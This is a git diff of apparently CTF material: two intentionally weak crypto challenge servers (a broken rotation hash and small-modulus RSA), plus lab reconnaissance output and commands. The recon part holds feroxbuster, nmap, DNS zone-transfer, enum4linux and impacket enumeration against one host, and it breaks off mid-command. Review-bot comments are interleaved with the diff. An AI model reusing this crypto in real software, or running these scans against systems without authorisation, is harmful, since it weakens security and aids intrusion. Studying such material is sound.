diff --git a/LaokoonHaxorcist/crypto_me_is_me/server.py b/LaokoonHaxorcist/crypto_me_is_me/server.py
new file mode 100644
index 00000000..d1720f64
--- /dev/null
+++ b/LaokoonHaxorcist/crypto_me_is_me/server.py
@@ -0,0 +1,42 @@
+from secret import FLAG
+from hashlib import sha256
+
+
+class hash():
+
+ def __init__(self, message):
+ self.message = message
+
+ def rotate(self, message):
+ return [((b >> 4) | (b << 3)) & 0xff for b in message]
+
+ def hexdigest(self):
+ rotated = self.rotate(self.message)
+ return sha256(bytes(rotated)).hexdigest()
+
+
+def main():
+ original_message = b"ready_play_one!"
+ original_digest = hash(original_message).hexdigest()
+ print(
+ f"Find a message that generate the same hash as this one: {original_digest}"
+ )
+
+ while True:
+ try:
+ message = input("Enter your message: ")
+ message = bytes.fromhex(message)
+
+ digest = hash(message).hexdigest()
+
+ if ((original_digest == digest) and (message != original_message)):
+ print(f"{FLAG}")
+ else:
+ print("Conditions not satisfied!")
+
+ except Exception as e:
+ print(f"An error occurred while processing data: {e}")
+
+
+if __name__ == '__main__':
+ main()
diff --git a/LaokoonHaxorcist/crypto_psa_games/server.py b/LaokoonHaxorcist/crypto_psa_games/server.py
new file mode 100644
index 00000000..e5847da9
--- /dev/null
+++ b/LaokoonHaxorcist/crypto_psa_games/server.py
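Review bot: In crypto_me_is_me/server.py, `hash.rotate` is not a true 8-bit rotation, because its shift amounts (`>> 4` and `<< 3`) do not sum to 8; the byte transform is therefore not one-to-one, and the collision resistance of SHA-256 does not carry over to `hexdigest`. If that is the intended weakness of the challenge, a comment above `rotate` should say so; otherwise the line should be a real rotation, e.g. `return [((b >> 4) | (b << 4)) & 0xff for b in message]`. Separately, `except Exception as e` in `main` also catches the `EOFError` that `input()` raises when the client closes its input, so the `while True` loop can spin instead of ending; an `except EOFError: break` clause ahead of it would stop that. The class name `hash` also shadows the builtin of the same name and would read better as something like `RotatedSha256`.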
@@ -0,0 +1,58 @@
+from Crypto.Util.number import bytes_to_long, getPrime, GCD
+from Crypto.Util.Padding import pad
+# from secret import FLAG
+
+WELCOME = '''Welcome to my custom PSA cryptosystem!
+In this cryptosystem, the message is PKCS#7 padded and then encrypted with RSA.
+They say padding makes encryption more secure, right? ;)'''
+
+MENU = '''
+[1] Encrypt the flag
+[2] Exit
+'''
+
+
+class PSA:
+
+ def __init__(self):
+ self.bit_size = 512
+ self.e = 11
+
+ def gen_modulus(self):
+ while True:
+ p = getPrime(self.bit_size // 2)
+ q = getPrime(self.bit_size // 2)
+ if GCD(self.e, (p - 1) * (q - 1)) == 1:
+ break
+ return p * q
+
+ def encrypt(self, msg):
+ m = bytes_to_long(pad(msg, 16))
+ n = self.gen_modulus()
+ c = pow(m, self.e, n)
+ return c, n
+
+
+def main():
+ psa = PSA()
+ print(WELCOME)
+ while True:
+ try:
+ print(MENU)
+ opt = input('> ')
+ if opt == '1':
+ enc, modulus = psa.encrypt(b'FLAG')
+ print(f"\n{hex(enc)}\n{hex(modulus)}")
+ elif opt == '2':
+ print('Bye.')
+ exit(1)
+ else:
+ print('\nInvalid option!')
+ except:
+ print('\n\nSomething went wrong.')
+ exit(1)
+
+
+if __name__ == '__main__':
+ # main()
+ print(0x65c96a10a5553c2eb1b05ac1369a777089841005b055cbf8dcafc41fd1d11b0a0306b820cbc742796318694b9fdf145214ef3a2385984daa0d6d5ba87bdce687)
\ No newline at end of file
diff --git a/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state b/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state
new file mode 100644
index 00000000..50bc5b6d
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state
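Review bot: In crypto_psa_games/server.py, `PSA.encrypt` applies textbook RSA with `e = 11` to a PKCS#7-padded message; that padding is deterministic and `gen_modulus` draws a fresh 512-bit modulus on every call, so the same padded plaintext is released under as many different moduli as a client requests, with no randomisation at all. If this is the intended weakness of the challenge, a comment above `encrypt` should say so; anywhere else the scheme needs randomised padding under one fixed key of at least 2048 bits, for example `PKCS1_OAEP` from `Crypto.Cipher`. Separately, the bare `except:` in `main` also catches the `SystemExit` raised by `exit(1)` for option 2, so a normal exit prints 'Something went wrong.'; `except Exception:` together with `exit(0)` on that branch would avoid it. The committed file has `from secret import FLAG` and `main()` commented out and encrypts the literal `b'FLAG'`, which looks like local debugging state rather than the server as deployed.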
@@ -0,0 +1 @@ +{"scans":[{"id":"c91a32f9c25f4d919c972d924014c2df","url":"http://10.129.243.131:80/","normalized_url":"http://10.129.243.131:80/","scan_type":"Directory","status":"Running","num_requests":833000},{"id":"4738972d3e8744bd9aa88c8925201b37","url":"http://10.129.243.131/text/","normalized_url":"http://10.129.243.131/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"127b151685a44a88aa7cd792c4435b75","url":"http://10.129.243.131/script.js","normalized_url":"http://10.129.243.131/script.js/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0957cded65794d41a274d2df66abcfbb","url":"http://10.129.243.131/text/css","normalized_url":"http://10.129.243.131/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0036760fe13545d79aa04cc6cc7dc498","url":"http://10.129.243.131/style.css","normalized_url":"http://10.129.243.131/style.css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ee08d5151dfc4a7d96671603842a22eb","url":"http://10.129.243.131/.git/text/","normalized_url":"http://10.129.243.131/.git/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"b52e11997d8e42278f8b27518a121b23","url":"http://10.129.243.131/.git/text/css","normalized_url":"http://10.129.243.131/.git/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"4607674520054cfbbba2277f855ee224","url":"http://10.129.243.131/.git/logs/text/","normalized_url":"http://10.129.243.131/.git/logs/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"65d97633b79d48749bc176e399a4b70d","url":"http://10.129.243.131/.git/logs/text/css","normalized_url":"http://10.129.243.131/.git/logs/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"046706eb4fef490fa0a098b88dee49bc","url":"http://10.129.243.131/.svn/text/css","normalized_url":"http://10.129.243.131/.svn/text/css/","scan_type":"File","status":"NotStarted","num
_requests":833000},{"id":"27943d584c634bac95093f6a03f41ada","url":"http://10.129.243.131/.svn/text/","normalized_url":"http://10.129.243.131/.svn/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"356dcc3f1e03417aa78932513d2f9d02","url":"http://10.129.243.131/.well-known/text/","normalized_url":"http://10.129.243.131/.well-known/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"9a77c322bbe54bd98cf5265ae43eb2ab","url":"http://10.129.243.131/.well-known/autoconfig/text/","normalized_url":"http://10.129.243.131/.well-known/autoconfig/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e21ae1192e294b5a849b688b56b69625","url":"http://10.129.243.131/.well-known/text/css","normalized_url":"http://10.129.243.131/.well-known/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e08380f4f1dc4597871aa763ef00eb08","url":"http://10.129.243.131/.well-known/autoconfig/text/css","normalized_url":"http://10.129.243.131/.well-known/autoconfig/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"59d5ebeacaea473b87cba620e094d24e","url":"http://10.129.243.131/CVS/text/","normalized_url":"http://10.129.243.131/CVS/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"afb07d7bdff44414a8184420bd330e77","url":"http://10.129.243.131/CVS/text/css","normalized_url":"http://10.129.243.131/CVS/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"851db73660fa47709b315e88932f5c61","url":"http://10.129.243.131/_vti_bin/_vti_adm/text/css","normalized_url":"http://10.129.243.131/_vti_bin/_vti_adm/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"652dab299a6045e0bd3e7ce168cf7bef","url":"http://10.129.243.131/_vti_bin/_vti_aut/text/","normalized_url":"http://10.129.243.131/_vti_bin/_vti_aut/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"d6467b8752394e9c
91037814ffc40cf9","url":"http://10.129.243.131/_vti_bin/_vti_adm/text/","normalized_url":"http://10.129.243.131/_vti_bin/_vti_adm/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"9d77e48ae1a749e2a6eda6a69a9aa853","url":"http://10.129.243.131/_vti_bin/_vti_aut/text/css","normalized_url":"http://10.129.243.131/_vti_bin/_vti_aut/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e60310109bb642f9a8072f90dd66296d","url":"http://10.129.243.131/_vti_bin/text/css","normalized_url":"http://10.129.243.131/_vti_bin/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"c8b6036f78334b3ea8b9864af3e8bb19","url":"http://10.129.243.131/_vti_bin/text/","normalized_url":"http://10.129.243.131/_vti_bin/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0ff327c7b32c4308958e018b90ba7fe0","url":"http://10.129.243.131/android/text/","normalized_url":"http://10.129.243.131/android/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"20ffbdd5b7484a0cba1704aeebc63111","url":"http://10.129.243.131/android/text/css","normalized_url":"http://10.129.243.131/android/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"869cee124fc54b3784e986709e4f89bb","url":"http://10.129.243.131/api/text/css","normalized_url":"http://10.129.243.131/api/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e779936b7a624aea95e7f4aa040df421","url":"http://10.129.243.131/api/experiments/text/","normalized_url":"http://10.129.243.131/api/experiments/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"1075320433124adda1d6f355f6b4e6f3","url":"http://10.129.243.131/api/experiments/text/css","normalized_url":"http://10.129.243.131/api/experiments/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"dbb0024e529c42c89914719cb54b3628","url":"http://10.129.243.131/api/text/","no
rmalized_url":"http://10.129.243.131/api/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"94f7ec3044c7451e979d5e3b7a7e236a","url":"http://10.129.243.131/cgi-bin/text/","normalized_url":"http://10.129.243.131/cgi-bin/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"cea6f3f3a737419e94d10f14146f9758","url":"http://10.129.243.131/cgi-bin/text/css","normalized_url":"http://10.129.243.131/cgi-bin/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"3839e0a97e7e4fec83ea4b9640bc61dc","url":"http://10.129.243.131/federation/text/css","normalized_url":"http://10.129.243.131/federation/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"a7555d65e45144a9b3b24a99664d2789","url":"http://10.129.243.131/federation/text/","normalized_url":"http://10.129.243.131/federation/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"8cd8579744c84f17bd3857421a72f467","url":"http://10.129.243.131/ios/text/","normalized_url":"http://10.129.243.131/ios/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"df34b24b9eb348fba623cf7c65e0a629","url":"http://10.129.243.131/ios/text/css","normalized_url":"http://10.129.243.131/ios/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ce2cfbd99a594b0d9b8e1f366e397c00","url":"http://10.129.243.131/mfa/text/","normalized_url":"http://10.129.243.131/mfa/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"c573be1f27a84c0d9bf4ab3159a8e159","url":"http://10.129.243.131/mfa/text/css","normalized_url":"http://10.129.243.131/mfa/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"be8aeb2062db44a4b43808aca4915002","url":"http://10.129.243.131/oauth/text/","normalized_url":"http://10.129.243.131/oauth/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"b391907c71a44d1aaa6ea7044c15bcca","url":"
http://10.129.243.131/oauth/text/css","normalized_url":"http://10.129.243.131/oauth/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e3210ec8d76e4b92acb11be52cf001a3","url":"http://10.129.243.131/oauth/device/text/css","normalized_url":"http://10.129.243.131/oauth/device/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0f84c6da10064b50a6daeb87ec48ef3a","url":"http://10.129.243.131/oauth/device/text/","normalized_url":"http://10.129.243.131/oauth/device/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"4bca1f7ac3da46078a45d8df91cac6c7","url":"http://10.129.243.131/oauth/token/text/","normalized_url":"http://10.129.243.131/oauth/token/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"666b0e7248d54391aec3970842cc8ce3","url":"http://10.129.243.131/oauth/token/text/css","normalized_url":"http://10.129.243.131/oauth/token/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"00e94dec348b40d48fd0c6e0032833d8","url":"http://10.129.243.131/oidc/text/","normalized_url":"http://10.129.243.131/oidc/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"65e28d2f09ac4351a1647eed00ca6777","url":"http://10.129.243.131/oidc/text/css","normalized_url":"http://10.129.243.131/oidc/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"8ae71645bf82449fbe516854a791aedc","url":"http://10.129.243.131/servlet/text/css","normalized_url":"http://10.129.243.131/servlet/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"492f31b4c98f4ff082b471ddadc9bc2b","url":"http://10.129.243.131/servlet/text/","normalized_url":"http://10.129.243.131/servlet/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"f24a0b5e5b1b47eb97e1e39325733d2a","url":"http://10.129.243.131/token/text/css","normalized_url":"http://10.129.243.131/token/text/css/","scan_type":"F
ile","status":"NotStarted","num_requests":833000},{"id":"0bf1f3c3709347a29b773cce4142953d","url":"http://10.129.243.131/token/text/","normalized_url":"http://10.129.243.131/token/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0db5e881d72d48ada67955256fbded64","url":"http://10.129.243.131/v1/text/css","normalized_url":"http://10.129.243.131/v1/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"731da94d800046b68281f0e00d3dce0d","url":"http://10.129.243.131/v1/text/","normalized_url":"http://10.129.243.131/v1/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"6464d059fd104ad693dc951109999b1c","url":"http://10.129.243.131/v2/text/","normalized_url":"http://10.129.243.131/v2/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ade8a1306c3f4ccfa6e157960a19c64c","url":"http://10.129.243.131/v2/text/css","normalized_url":"http://10.129.243.131/v2/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000}],"config":{"type":"configuration","wordlist":"/root/.local/share/AutoRecon/wordlists/dirbuster.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://10.129.243.131:80/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":10,"timeout":7,"verbosity":1,"silent":false,"quiet":true,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":true,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_coun
t":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://10.129.243.131/script.js","original_url":"http://10.129.243.131/script.js","path":"/script.js","wildcard":false,"status":200,"method":"GET","content_length":692,"line_count":25,"word_count":72,"headers":{"accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\"","date":"Sat, 28 Oct 2023 12:22:06 GMT","content-type":"application/javascript","server":"Microsoft-IIS/10.0","content-length":"692","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT"},"extension":""},{"type":"response","url":"http://10.129.243.131/style.css","original_url":"http://10.129.243.131/style.css","path":"/style.css","wildcard":false,"status":200,"method":"GET","content_length":3166,"line_count":215,"word_count":294,"headers":{"last-modified":"Fri, 20 Aug 2021 13:41:48 GMT","content-type":"text/css","accept-ranges":"bytes","date":"Sat, 28 Oct 2023 12:22:06 GMT","content-length":"3166","etag":"\"0767d1fc995d71:0\"","server":"Microsoft-IIS/10.0"},"extension":""},{"type":"response","url":"http://10.129.243.131/","original_url":"http://10.129.243.131:80/","path":"/","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"date":"Sat, 28 Oct 2023 12:22:06 GMT","content-length":"1034","accept-ranges":"bytes","content-type":"text/html","last-modified":"Fri, 20 Aug 2021 13:39:48 
GMT","etag":"\"0eaf6d7c895d71:0\"","server":"Microsoft-IIS/10.0"},"extension":""},{"type":"response","url":"http://10.129.243.131/Index.html","original_url":"http://10.129.243.131:80/","path":"/Index.html","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"content-length":"1034","content-type":"text/html","server":"Microsoft-IIS/10.0","last-modified":"Fri, 20 Aug 2021 13:39:48 GMT","date":"Sat, 28 Oct 2023 12:22:17 GMT","accept-ranges":"bytes","etag":"\"0eaf6d7c895d71:0\""},"extension":""},{"type":"response","url":"http://10.129.243.131/LICENSE.txt","original_url":"http://10.129.243.131:80/","path":"/LICENSE.txt","wildcard":false,"status":200,"method":"GET","content_length":1092,"line_count":8,"word_count":168,"headers":{"content-type":"text/plain","accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\"","server":"Microsoft-IIS/10.0","date":"Sat, 28 Oct 2023 12:22:17 GMT","content-length":"1092","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT"},"extension":""},{"type":"response","url":"http://10.129.243.131/Search.php","original_url":"http://10.129.243.131:80/","path":"/Search.php","wildcard":false,"status":200,"method":"GET","content_length":116,"line_count":1,"word_count":14,"headers":{"x-powered-by":"PHP/8.0.0","date":"Sat, 28 Oct 2023 12:22:19 GMT","content-type":"text/html; charset=UTF-8","server":"Microsoft-IIS/10.0","content-length":"116"},"extension":""},{"type":"response","url":"http://10.129.243.131/index.html","original_url":"http://10.129.243.131:80/","path":"/index.html","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"content-type":"text/html","etag":"\"0eaf6d7c895d71:0\"","accept-ranges":"bytes","last-modified":"Fri, 20 Aug 2021 13:39:48 GMT","server":"Microsoft-IIS/10.0","date":"Sat, 28 Oct 2023 12:23:36 
GMT","content-length":"1034"},"extension":""},{"type":"response","url":"http://10.129.243.131/license.txt","original_url":"http://10.129.243.131:80/","path":"/license.txt","wildcard":false,"status":200,"method":"GET","content_length":1092,"line_count":8,"word_count":168,"headers":{"content-type":"text/plain","date":"Sat, 28 Oct 2023 12:23:47 GMT","content-length":"1092","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT","server":"Microsoft-IIS/10.0","accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\""},"extension":""},{"type":"response","url":"http://10.129.243.131/search.php","original_url":"http://10.129.243.131:80/","path":"/search.php","wildcard":false,"status":200,"method":"GET","content_length":116,"line_count":1,"word_count":14,"headers":{"x-powered-by":"PHP/8.0.0","server":"Microsoft-IIS/10.0","content-length":"116","content-type":"text/html; charset=UTF-8","date":"Sat, 28 Oct 2023 12:24:30 GMT"},"extension":""}],"statistics":{"type":"statistics","timeouts":70,"requests":135013,"expected_per_scan":833000,"total_expected":833385,"errors":70,"successes":12,"redirects":0,"client_errors":134931,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":55,"extensions_collected":0,"status_200s":12,"status_301s":0,"status_302s":0,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":9,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[]} \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/hashes.asreproast b/LaokoonHaxorcist/fullpwn/hashes.asreproast new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/local.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/local.txt new file mode 100644 index 00000000..e69de29b 
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt
new file mode 100644
index 00000000..1c35dda7
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt
@@ -0,0 +1,244 @@ +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. + + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] msrpc found on tcp/49667. + + + +[*] msrpc found on tcp/49673. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] msrpc found on tcp/49695. + + + +[*] msrpc found on tcp/49843. + + + +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. + + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] unknown found on tcp/49667. + + + +[*] unknown found on tcp/49673. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] unknown found on tcp/49695. + + + +[*] unknown found on tcp/49843. + + + +[*] domain found on udp/53. + + + +[*] ntp found on udp/123. + + + +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. 
+ + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] msrpc found on tcp/49667. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] msrpc found on tcp/49695. + + + +[*] msrpc found on tcp/49843. + + + +[*] domain found on udp/53. + + + +[*] kerberos-sec found on udp/88. + + + +[*] ntp found on udp/123. + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/proof.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/proof.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md new file mode 100644 index 00000000..65f369e2 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md 
@@ -0,0 +1,177 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX 
"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 
